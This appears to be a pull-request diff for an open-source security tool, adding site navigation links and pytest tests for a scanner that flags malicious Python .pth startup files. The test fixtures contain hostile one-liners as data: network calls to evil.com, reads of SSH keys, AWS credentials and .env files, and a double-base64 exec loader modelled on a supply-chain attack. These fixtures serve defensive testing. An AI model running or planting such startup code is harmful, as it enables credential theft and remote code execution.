+      <path d="M24 4L6 12v12c0 11.1 7.7 21.5 18 24 10.3-2.5 18-12.9 18-24V12L24 4z" fill="#0d1a0d" stroke="#00ff88" stroke-width="2"/>
+      <path d="M17 24l5 5 9-9" stroke="#00ff88" stroke-width="2.5" stroke-linecap="round" stroke-linejoin="round"/>
+    </svg>
+    AgentWard
+  </div>
+  <div class="footer-links">
+    <a href="index.html">Home</a>
+    <a href="how-it-works.html">How It Works</a>
+    <a href="docs.html">Docs</a>
+    <a href="compare.html">Compare</a>
+    <a href="incidents.html">Known Incidents</a>
+    <a href="about.html">About</a>
+    <a href="https://github.com/agentward-ai/agentward" target="_blank">GitHub</a>
+  </div>
+  <span class="footer-right">Apache 2.0 · Open Source</span>
+</footer>
+
+</body>
+</html>

--- a/docs/Site/index.html
+++ b/docs/Site/index.html
@@ -383,6 +383,7 @@
     <a href="how-it-works.html">How It Works</a>
     <a href="docs.html">Docs</a>
     <a href="compare.html">Compare</a>
+    <a href="incidents.html">Known Incidents</a>
     <a href="about.html">About</a>
     <a href="https://github.com/agentward-ai/agentward" target="_blank" rel="noopener" class="nav-gh">
       <svg width="14" height="14" viewBox="0 0 24 24" fill="currentColor"><path d="M12 0C5.37 0 0 5.37 0 12c0 5.31 3.435 9.795 8.205 11.385.6.105.825-.255.825-.57 0-.285-.015-1.23-.015-2.235-3.015.555-3.795-.735-4.035-1.41-.135-.345-.72-1.41-1.23-1.695-.42-.225-1.02-.78-.015-.795.945-.015 1.62.87 1.845 1.23 1.08 1.815 2.805 1.305 3.495.99.105-.78.42-1.305.765-1.605-2.67-.3-5.46-1.335-5.46-5.925 0-1.305.465-2.385 1.23-3.225-.12-.3-.54-1.53.12-3.18 0 0 1.005-.315 3.3 1.23.96-.27 1.98-.405 3-.405s2.04.135 3 .405c2.295-1.56 3.3-1.23 3.3-1.23.66 1.65.24 2.88.12 3.18.765.84 1.23 1.905 1.23 3.225 0 4.605-2.805 5.625-5.475 5.925.435.375.81 1.095.81 2.22 0 1.605-.015 2.895-.015 3.3 0 .315.225.69.825.57A12.02 12.02 0 0024 12c0-6.63-5.37-12-12-12z"/></svg>
@@ -398,6 +399,7 @@
   <a href="how-it-works.html">How It Works</a>
   <a href="docs.html">Docs</a>
   <a href="compare.html">Compare</a>
+  <a href="incidents.html">Known Incidents</a>
   <a href="about.html">About</a>
   <a href="https://github.com/agentward-ai/agentward" target="_blank" rel="noopener">GitHub</a>
 </div>
@@ -762,6 +764,7 @@
     <a href="how-it-works.html">How It Works</a>
     <a href="docs.html">Docs</a>
     <a href="compare.html">Compare</a>
+    <a href="incidents.html">Known Incidents</a>
     <a href="about.html">About</a>
     <a href="https://github.com/agentward-ai/agentward" target="_blank">GitHub</a>
     <!--email_off--><a href="mailto:aditya@agentward.ai">aditya@agentward.ai</a><!--/email_off-->

--- a/tests/test_scan_pth.py
+++ b/tests/test_scan_pth.py
@@ -1,0 +1,662 @@
+"""Tests for the .pth file supply chain scanner.
+
+Covers:
+  - Clean .pth files (path-only, no executable content)
+  - Known-good allowlisted files (distutils-precedence, editable installs)
+  - CRITICAL patterns: base64 decode, subprocess, os.system, eval, network calls
+  - Litellm-style double-encoded base64 payload (supply chain attack fixture)
+  - Simple legitimate import (WARNING)
+  - Empty .pth file (skip / no findings)
+  - Binary content (CRITICAL)
+  - Oversized file (CRITICAL)
+  - Permission errors (WARNING)
+  - Allowlist verification
+  - Site-packages directory discovery
+  - PthScanResult properties (has_critical, has_warning)
+  - Output format helpers (markdown section, SARIF entries)
+"""
+
+from __future__ import annotations
+
+import os
+from pathlib import Path
+
+import pytest
+
+from agentward.scan.pth_scanner import (
+    PthFinding,
+    PthScanResult,
+    _analyze_pth_file,
+    _is_allowlisted,
+    scan_pth_files,
+)
+
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+
+
+def _write_pth(tmp_path: Path, name: str, content: str) -> Path:
+    """Write a .pth file with the given content and return its path."""
+    p = tmp_path / name
+    p.write_text(content, encoding="utf-8")
+    return p
+
+
+# ---------------------------------------------------------------------------
+# PthScanResult property tests
+# ---------------------------------------------------------------------------
+
+
+def test_pth_scan_result_empty():
+    r = PthScanResult()
+    assert not r.has_critical
+    assert not r.has_warning
+    assert r.files_scanned == 0
+
+
+def test_pth_scan_result_has_critical():
+    r = PthScanResult(findings=[
+        PthFinding(severity="CRITICAL", file="x.pth", line_number=1, pattern="eval_exec", evidence="eval(x)", description="d"),
+    ])
+    assert r.has_critical
+    assert not r.has_warning  # no WARNING findings
+
+
+def test_pth_scan_result_has_warning():
+    r = PthScanResult(findings=[
+        PthFinding(severity="WARNING", file="x.pth", line_number=1, pattern="executable_import", evidence="import foo", description="d"),
+    ])
+    assert not r.has_critical
+    assert r.has_warning
+
+
+def test_pth_scan_result_mixed_severity():
+    r = PthScanResult(findings=[
+        PthFinding(severity="CRITICAL", file="a.pth", line_number=1, pattern="eval_exec", evidence="eval(x)", description="d"),
+        PthFinding(severity="WARNING", file="b.pth", line_number=2, pattern="executable_import", evidence="import foo", description="d"),
+    ])
+    assert r.has_critical
+    assert r.has_warning
+
+
+# ---------------------------------------------------------------------------
+# Empty .pth file — no findings
+# ---------------------------------------------------------------------------
+
+
+def test_empty_pth_file(tmp_path):
+    p = _write_pth(tmp_path, "empty.pth", "")
+    findings = _analyze_pth_file(p)
+    assert findings == []
+
+
+def test_blank_lines_and_comments_only(tmp_path):
+    p = _write_pth(tmp_path, "comments.pth", "# comment\n\n  \n# another\n")
+    findings = _analyze_pth_file(p)
+    assert findings == []
+
+
+# ---------------------------------------------------------------------------
+# Path-only .pth files — no executable content → no findings
+# ---------------------------------------------------------------------------
+
+
+def test_path_only_pth(tmp_path):
+    p = _write_pth(tmp_path, "paths.pth", "/usr/local/lib/python3.11/site-packages\n/opt/conda/lib\n")
+    findings = _analyze_pth_file(p)
+    assert findings == []
+
+
+def test_path_only_with_existing_paths(tmp_path):
+    """Paths that exist — still no findings (path-only lines are not executable)."""
+    p = _write_pth(tmp_path, "real_paths.pth", str(tmp_path) + "\n")
+    findings = _analyze_pth_file(p)
+    assert findings == []
+
+
+# ---------------------------------------------------------------------------
+# Allowlisted files — known-good
+# ---------------------------------------------------------------------------
+
+
+def test_allowlisted_distutils_precedence(tmp_path):
+    """distutils-precedence.pth with the exact known-good import."""
+    p = _write_pth(tmp_path, "distutils-precedence.pth", "import _distutils_hack\n")
+    findings = _analyze_pth_file(p)
+    assert findings == [], f"Expected no findings, got {findings}"
+
+
+def test_allowlisted_distutils_precedence_no_import(tmp_path):
+    """distutils-precedence.pth with NO executable lines — also OK."""
+    p = _write_pth(tmp_path, "distutils-precedence.pth", "/usr/lib/python3/dist-packages\n")
+    findings = _analyze_pth_file(p)
+    assert findings == []
+
+
+def test_allowlisted_editable_install(tmp_path):
+    """__editable__*.pth files are always safe (editable installs)."""
+    p = _write_pth(tmp_path, "__editable__mypackage-0.1.pth", "import __editable__mypackage\n")
+    findings = _analyze_pth_file(p)
+    assert findings == []
+
+
+def test_allowlisted_editable_by_substring(tmp_path):
+    """Files with __editable__ in name are allowlisted regardless of content."""
+    p = _write_pth(tmp_path, "__editable__.myproj-1.0.pth", "/some/path\n")
+    findings = _analyze_pth_file(p)
+    assert findings == []
+
+
+def test_allowlisted_nspkg_by_suffix(tmp_path):
+    """-nspkg.pth files are allowlisted (namespace packages)."""
+    p = _write_pth(tmp_path, "somepackage-nspkg.pth", "/some/path\n")
+    findings = _analyze_pth_file(p)
+    assert findings == []
+
+
+def test_allowlisted_pytest_enabler(tmp_path):
+    """pytest-enabler.pth with known-good content."""
+    p = _write_pth(tmp_path, "pytest-enabler.pth", "import pytest_enabler\n")
+    findings = _analyze_pth_file(p)
+    assert findings == []
+
+
+def test_allowlist_bad_content_overrides(tmp_path):
+    """Even a known-good filename triggers a finding if content doesn't match allowlist."""
+    p = _write_pth(tmp_path, "distutils-precedence.pth", "import subprocess; subprocess.run(['id'])\n")
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" for f in findings)
+
+
+# ---------------------------------------------------------------------------
+# WARNING: executable import lines not on allowlist
+# ---------------------------------------------------------------------------
+
+
+def test_simple_import_warning(tmp_path):
+    """An import line in an unknown file gets a WARNING."""
+    p = _write_pth(tmp_path, "somepackage.pth", "import somepackage\n")
+    findings = _analyze_pth_file(p)
+    assert len(findings) == 1
+    assert findings[0].severity == "WARNING"
+    assert findings[0].pattern == "executable_import"
+    assert findings[0].line_number == 1
+
+
+def test_multiple_import_warnings(tmp_path):
+    """Multiple executable lines each get a WARNING."""
+    p = _write_pth(tmp_path, "multi.pth", "import foo\nimport bar\n")
+    findings = _analyze_pth_file(p)
+    assert len(findings) == 2
+    assert all(f.severity == "WARNING" for f in findings)
+    assert findings[0].line_number == 1
+    assert findings[1].line_number == 2
+
+
+# ---------------------------------------------------------------------------
+# CRITICAL: base64 decode patterns
+# ---------------------------------------------------------------------------
+
+
+def test_base64_decode_critical(tmp_path):
+    """import line with b64decode triggers CRITICAL."""
+    p = _write_pth(tmp_path, "malicious.pth", "import base64; base64.b64decode('cGF5bG9hZA==')\n")
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" for f in findings)
+    assert any("base64" in f.pattern for f in findings)
+
+
+def test_double_base64_decode_critical(tmp_path):
+    """Double base64 decode (litellm attack pattern) triggers CRITICAL with double_base64_decode rule."""
+    # Simulated litellm_init.pth attack: double-encoded payload
+    payload = "import base64; exec(base64.b64decode(base64.b64decode(b'Y29kZQ==')))"
+    p = _write_pth(tmp_path, "litellm_init.pth", payload + "\n")
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" for f in findings)
+    assert any(f.pattern == "double_base64_decode" for f in findings)
+
+
+def test_litellm_style_payload_fixture(tmp_path):
+    """Full litellm supply chain attack fixture — must be detected as CRITICAL.
+
+    The March 2026 litellm attack used a .pth file with an 'import' line
+    containing double-encoded base64 to execute a payload at interpreter startup.
+    """
+    # Realistic payload structure (obfuscated, double-encoded)
+    attack_line = (
+        "import base64,sys;"
+        "exec(base64.b64decode(base64.b64decode("
+        "b'dGVzdF9wYXlsb2Fk'  # outer encoding\n"
+        ")))\n"
+    )
+    p = _write_pth(tmp_path, "litellm_init.pth", attack_line)
+    findings = _analyze_pth_file(p)
+    critical = [f for f in findings if f.severity == "CRITICAL"]
+    assert len(critical) >= 1, f"Expected CRITICAL finding, got {findings}"
+    # Evidence should be present
+    assert any(f.evidence for f in critical)
+
+
+# ---------------------------------------------------------------------------
+# CRITICAL: subprocess execution
+# ---------------------------------------------------------------------------
+
+
+def test_subprocess_popen_critical(tmp_path):
+    p = _write_pth(tmp_path, "bad.pth", "import subprocess; subprocess.Popen(['curl', 'http://evil.com'])\n")
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" and f.pattern == "subprocess_exec" for f in findings)
+
+
+def test_subprocess_run_critical(tmp_path):
+    p = _write_pth(tmp_path, "bad.pth", "import subprocess; subprocess.run(['id'])\n")
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" for f in findings)
+
+
+def test_subprocess_check_output_critical(tmp_path):
+    p = _write_pth(tmp_path, "bad.pth", "import subprocess; subprocess.check_output('whoami')\n")
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" for f in findings)
+
+
+# ---------------------------------------------------------------------------
+# CRITICAL: os execution
+# ---------------------------------------------------------------------------
+
+
+def test_os_system_critical(tmp_path):
+    p = _write_pth(tmp_path, "bad.pth", "import os; os.system('id')\n")
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" and f.pattern == "os_exec" for f in findings)
+
+
+def test_os_popen_critical(tmp_path):
+    p = _write_pth(tmp_path, "bad.pth", "import os; os.popen('id').read()\n")
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" for f in findings)
+
+
+# ---------------------------------------------------------------------------
+# CRITICAL: eval / exec / compile
+# ---------------------------------------------------------------------------
+
+
+def test_eval_critical(tmp_path):
+    p = _write_pth(tmp_path, "bad.pth", "import something; eval(something.get_code())\n")
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" and f.pattern == "eval_exec" for f in findings)
+
+
+def test_exec_critical(tmp_path):
+    p = _write_pth(tmp_path, "bad.pth", "import something; exec(open('/tmp/x').read())\n")
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" for f in findings)
+
+
+def test_compile_critical(tmp_path):
+    p = _write_pth(tmp_path, "bad.pth", "import something; compile(something, '<str>', 'exec')\n")
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" for f in findings)
+
+
+# ---------------------------------------------------------------------------
+# CRITICAL: network calls
+# ---------------------------------------------------------------------------
+
+
+def test_urllib_network_critical(tmp_path):
+    p = _write_pth(tmp_path, "bad.pth", "import urllib.request; urllib.request.urlopen('http://evil.com')\n")
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" and f.pattern == "network_urllib" for f in findings)
+
+
+def test_requests_network_critical(tmp_path):
+    p = _write_pth(tmp_path, "bad.pth", "import requests; requests.get('http://evil.com/steal')\n")
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" and f.pattern == "network_requests" for f in findings)
+
+
+def test_http_client_critical(tmp_path):
+    p = _write_pth(tmp_path, "bad.pth", "import http.client; conn = http.client.HTTPSConnection('evil.com')\n")
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" for f in findings)
+
+
+def test_socket_connect_critical(tmp_path):
+    p = _write_pth(tmp_path, "bad.pth", "import socket; socket.socket().connect(('evil.com', 443))\n")
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" for f in findings)
+
+
+# ---------------------------------------------------------------------------
+# CRITICAL: sensitive file reads
+# ---------------------------------------------------------------------------
+
+
+def test_ssh_key_read_critical(tmp_path):
+    p = _write_pth(tmp_path, "bad.pth", "import builtins; open(os.path.expanduser('~/.ssh/id_rsa')).read()\n")
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" and f.pattern == "sensitive_file_read" for f in findings)
+
+
+def test_aws_credentials_read_critical(tmp_path):
+    p = _write_pth(tmp_path, "bad.pth", "import os; open(os.path.expanduser('~/.aws/credentials')).read()\n")
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" for f in findings)
+
+
+def test_env_file_read_critical(tmp_path):
+    p = _write_pth(tmp_path, "bad.pth", "import os; data = open('.env').read()\n")
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" for f in findings)
+
+
+# ---------------------------------------------------------------------------
+# CRITICAL: binary content
+# ---------------------------------------------------------------------------
+
+
+def test_binary_content_critical(tmp_path):
+    """Files with high non-printable byte content are CRITICAL."""
+    p = tmp_path / "binary.pth"
+    # Write binary content (NUL bytes, control chars)
+    p.write_bytes(b"\x00\x01\x02\x03" * 50 + b"import os")
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" and f.pattern == "binary_content" for f in findings)
+
+
+def test_null_bytes_binary_critical(tmp_path):
+    """Pure null bytes → binary content → CRITICAL."""
+    p = tmp_path / "null.pth"
+    p.write_bytes(b"\x00" * 100)
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" for f in findings)
+
+
+# ---------------------------------------------------------------------------
+# CRITICAL: oversized file
+# ---------------------------------------------------------------------------
+
+
+def test_oversized_file_critical(tmp_path, monkeypatch):
+    """Files >1MB are flagged CRITICAL without reading full content."""
+    import agentward.scan.pth_scanner as pth_mod
+
+    # Monkeypatch _MAX_FILE_SIZE to a small value for testing
+    monkeypatch.setattr(pth_mod, "_MAX_FILE_SIZE", 10)
+    p = _write_pth(tmp_path, "big.pth", "import os\n" * 5)  # >10 bytes
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "CRITICAL" and f.pattern == "oversized_file" for f in findings)
+
+
+# ---------------------------------------------------------------------------
+# Permission errors
+# ---------------------------------------------------------------------------
+
+
+def test_permission_denied_warning(tmp_path, monkeypatch):
+    """Permission denied reading file → WARNING (not crash)."""
+    p = _write_pth(tmp_path, "unreadable.pth", "import foo\n")
+
+    original_read_bytes = Path.read_bytes
+
+    def mock_read_bytes(self):
+        if self.name == "unreadable.pth":
+            raise PermissionError("Permission denied")
+        return original_read_bytes(self)
+
+    monkeypatch.setattr(Path, "read_bytes", mock_read_bytes)
+    findings = _analyze_pth_file(p)
+    assert any(f.severity == "WARNING" and f.pattern == "permission_denied" for f in findings)
+
+
+# ---------------------------------------------------------------------------
+# Evidence truncation
+# ---------------------------------------------------------------------------
+
+
+def test_evidence_truncated(tmp_path):
+    """Very long lines have evidence truncated to 200 chars."""
+    long_line = "import " + "a" * 500 + "\n"
+    p = _write_pth(tmp_path, "long.pth", long_line)
+    findings = _analyze_pth_file(p)
+    assert findings
+    assert len(findings[0].evidence) <= 200
+
+
+# ---------------------------------------------------------------------------
+# _is_allowlisted helper
+# ---------------------------------------------------------------------------
+
+
+def test_is_allowlisted_exact_match():
+    assert _is_allowlisted("distutils-precedence.pth", [(1, "import _distutils_hack")])
+
+
+def test_is_allowlisted_no_exec_lines():
+    """Empty executable lines → allowlisted (path-only file)."""
+    assert _is_allowlisted("distutils-precedence.pth", [])
+
+
+def test_is_allowlisted_wrong_content():
+    assert not _is_allowlisted("distutils-precedence.pth", [(1, "import subprocess")])
+
+
+def test_is_allowlisted_unknown_file():
+    assert not _is_allowlisted("someunknown.pth", [(1, "import something")])
+
+
+def test_is_allowlisted_editable_substring():
+    assert _is_allowlisted("__editable__mypackage-1.0.pth", [(1, "import __editable__mypackage")])
+
+
+def test_is_allowlisted_nspkg_suffix():
+    assert _is_allowlisted("ipython_genutils-nspkg.pth", [(1, "import foo")])
+
+
+# ---------------------------------------------------------------------------
+# scan_pth_files() integration test
+# ---------------------------------------------------------------------------
+
+
+def test_scan_pth_files_clean_dir(tmp_path):
+    """Scanning a directory with only clean .pth files returns no critical findings."""
+    _write_pth(tmp_path, "clean.pth", "/some/path\n")
+    _write_pth(tmp_path, "distutils-precedence.pth", "import _distutils_hack\n")
+
+    result = scan_pth_files(extra_dirs=[tmp_path])
+    assert result.files_scanned >= 2
+    assert not result.has_critical
+
+
+def test_scan_pth_files_detects_malicious(tmp_path):
+    """Scanning a directory with a malicious .pth file returns CRITICAL findings."""
+    _write_pth(tmp_path, "malicious.pth", "import base64; exec(base64.b64decode(b'dGVzdA=='))\n")
+
+    result = scan_pth_files(extra_dirs=[tmp_path])
+    assert result.files_scanned >= 1
+    assert result.has_critical
+
+
+def test_scan_pth_files_returns_errors_on_bad_dir():
+    """Scanning a non-existent directory doesn't crash — errors are collected."""
+    result = scan_pth_files(extra_dirs=[Path("/nonexistent/path/that/does/not/exist")])
+    # Should not raise; non-existent dirs are silently skipped
+    assert isinstance(result, PthScanResult)
+
+
+def test_scan_pth_files_multiple_dirs(tmp_path):
+    """Results combine findings from all provided directories."""
+    dir1 = tmp_path / "sp1"
+    dir2 = tmp_path / "sp2"
+    dir1.mkdir()
+    dir2.mkdir()
+    _write_pth(dir1, "a.pth", "import foo\n")
+    _write_pth(dir2, "b.pth", "import subprocess; subprocess.Popen(['id'])\n")
+
+    result = scan_pth_files(extra_dirs=[dir1, dir2])
+    assert result.files_scanned >= 2
+    assert result.has_critical
+    assert result.has_warning
+
+
+def test_scan_pth_files_site_packages_dirs_populated(tmp_path):
+    """site_packages_dirs is populated even when scanning custom dirs."""
+    result = scan_pth_files(extra_dirs=[tmp_path])
+    assert isinstance(result.site_packages_dirs, list)
+
+
+# ---------------------------------------------------------------------------
+# Markdown report integration
+# ---------------------------------------------------------------------------
+
+
+def test_markdown_report_includes_pth_section():
+    """generate_scan_markdown includes .pth section when pth_result is present."""
+    from agentward.scan.pth_scanner import PthScanResult, PthFinding
+    from agentward.scan.permissions import ScanResult
+    from agentward.scan.report import generate_scan_markdown
+
+    scan = ScanResult()
+    scan.pth_result = PthScanResult(
+        findings=[PthFinding(
+            severity="CRITICAL",
+            file="/usr/lib/python3/site-packages/malicious.pth",
+            line_number=1,
+            pattern="base64_decode",
+            evidence="import base64; exec(base64.b64decode(...))",
+            description="Base64 decoding in .pth startup code",
+        )],
+        files_scanned=5,
+        site_packages_dirs=["/usr/lib/python3/site-packages"],
+    )
+
+    md = generate_scan_markdown(scan, [], chains=[])
+    assert "Supply Chain" in md
+    assert "pth" in md.lower() or ".pth" in md
+    assert "CRITICAL" in md
+
+
+def test_markdown_report_clean_pth_section():
+    """generate_scan_markdown includes .pth section with no findings."""
+    from agentward.scan.pth_scanner import PthScanResult
+    from agentward.scan.permissions import ScanResult
+    from agentward.scan.report import generate_scan_markdown
+
+    scan = ScanResult()
+    scan.pth_result = PthScanResult(files_scanned=3)
+
+    md = generate_scan_markdown(scan, [], chains=[])
+    assert "Supply Chain" in md
+    assert "No suspicious" in md
+
+
+def test_markdown_report_no_pth_section_when_none():
+    """generate_scan_markdown has no .pth section when pth_result is None."""
+    from agentward.scan.permissions import ScanResult
+    from agentward.scan.report import generate_scan_markdown
+
+    scan = ScanResult()
+    # pth_result is None (not set)
+    md = generate_scan_markdown(scan, [], chains=[])
+    assert "Supply Chain: .pth" not in md
+
+
+# ---------------------------------------------------------------------------
+# SARIF report integration
+# ---------------------------------------------------------------------------
+
+
+def test_sarif_report_includes_pth_results():
+    """generate_sarif includes .pth findings as SARIF results."""
+    import json
+    from agentward.scan.pth_scanner import PthScanResult, PthFinding
+    from agentward.scan.permissions import ScanResult
+    from agentward.scan.sarif_report import generate_sarif
+
+    scan = ScanResult()
+    scan.pth_result = PthScanResult(
+        findings=[PthFinding(
+            severity="CRITICAL",
+            file="/usr/lib/python3/site-packages/malicious.pth",
+            line_number=2,
+            pattern="subprocess_exec",
+            evidence="import subprocess; subprocess.Popen(['id'])",
+            description="Subprocess execution at interpreter startup",
+        )],
+        files_scanned=1,
+    )
+
+    sarif_str = generate_sarif(scan, [], chains=[])
+    sarif = json.loads(sarif_str)
+
+    results = sarif["runs"][0]["results"]
+    pth_results = [r for r in results if "pth" in r.get("ruleId", "")]
+    assert len(pth_results) >= 1
+    assert pth_results[0]["level"] == "error"
+    assert pth_results[0]["locations"][0]["physicalLocation"]["region"]["startLine"] == 2
+
+
+def test_sarif_report_no_pth_when_none():
+    """generate_sarif has no pth rules/results when pth_result is None."""
+    import json
+    from agentward.scan.permissions import ScanResult
+    from agentward.scan.sarif_report import generate_sarif
+
+    scan = ScanResult()
+    sarif_str = generate_sarif(scan, [], chains=[])
+    sarif = json.loads(sarif_str)
+    results = sarif["runs"][0]["results"]
+    pth_results = [r for r in results if "pth" in r.get("ruleId", "")]
+    assert pth_results == []
+
+
+def test_sarif_report_ok_findings_excluded():
+    """generate_sarif skips OK-severity pth findings."""
+    import json
+    from agentward.scan.pth_scanner import PthScanResult, PthFinding
+    from agentward.scan.permissions import ScanResult
+    from agentward.scan.sarif_report import generate_sarif
+
+    scan = ScanResult()
+    scan.pth_result = PthScanResult(
+        findings=[PthFinding(
+            severity="OK",
+            file="/ok.pth",
+            line_number=None,
+            pattern="allowlisted",
+            evidence="",
+            description="OK",
+        )],
+        files_scanned=1,
+    )
+
+    sarif_str = generate_sarif(scan, [], chains=[])
+    sarif = json.loads(sarif_str)
+    results = sarif["runs"][0]["results"]
+    pth_results = [r for r in results if "pth" in r.get("ruleId", "")]
+    assert pth_results == []
+
+
+# ---------------------------------------------------------------------------
+# Line number tracking
+# ---------------------------------------------------------------------------
+
+
+def test_line_numbers_tracked_correctly(tmp_path):
+    """Findings report the correct 1-based line number."""
+    content = "# comment\n/path/to/lib\nimport evil_module\n"
+    p = _write_pth(tmp_path, "linenum.pth", content)
+    findings = _analyze_pth_file(p)
+    assert any(f.line_number == 3 for f in findings)
+
+
+def test_line_numbers_blank_lines_counted(tmp_path):
+    """Blank lines count toward line numbers."""
+    content = "\n\nimport bad_module\n"
+    p = _write_pth(tmp_path, "linenum2.pth", content)
+    findings = _analyze_pth_file(p)
+    assert any(f.line_number == 3 for f in findings)


### PR DESCRIPTION
## Summary

- **Supply chain scanner** (`agentward/scan/pth_scanner.py`): detects malicious `.pth` files in Python site-packages directories. `.pth` files execute `import` lines at interpreter startup; this mechanism was exploited in the March 2026 litellm compromise via double-encoded base64 payloads.
- **59 tests** covering all detection patterns (base64 decode, subprocess, eval, network calls, sensitive file reads, binary content, oversized files), allowlist logic, and output format integration (markdown, SARIF, terminal)
- **CLI flags**: `agentward scan --scan-site-packages` / `--skip-site-packages`
- **README updates** (Task 2 + Task 3): five-step lifecycle framing, `agentward probe` as workflow step 5, comparison table updated with package scanners, `.pth` scanner section with pattern table

## Test plan

- [x] `pytest tests/test_scan_pth.py` — 59/59 pass
- [x] Full test suite: 2461 passed, 3 pre-existing failures (unrelated: missing `anthropic` SDK in test env)
- [x] Pre-existing failures confirmed unchanged from base branch (test_constraints.py ImportError and test_stress.py LlmJudge SDK tests)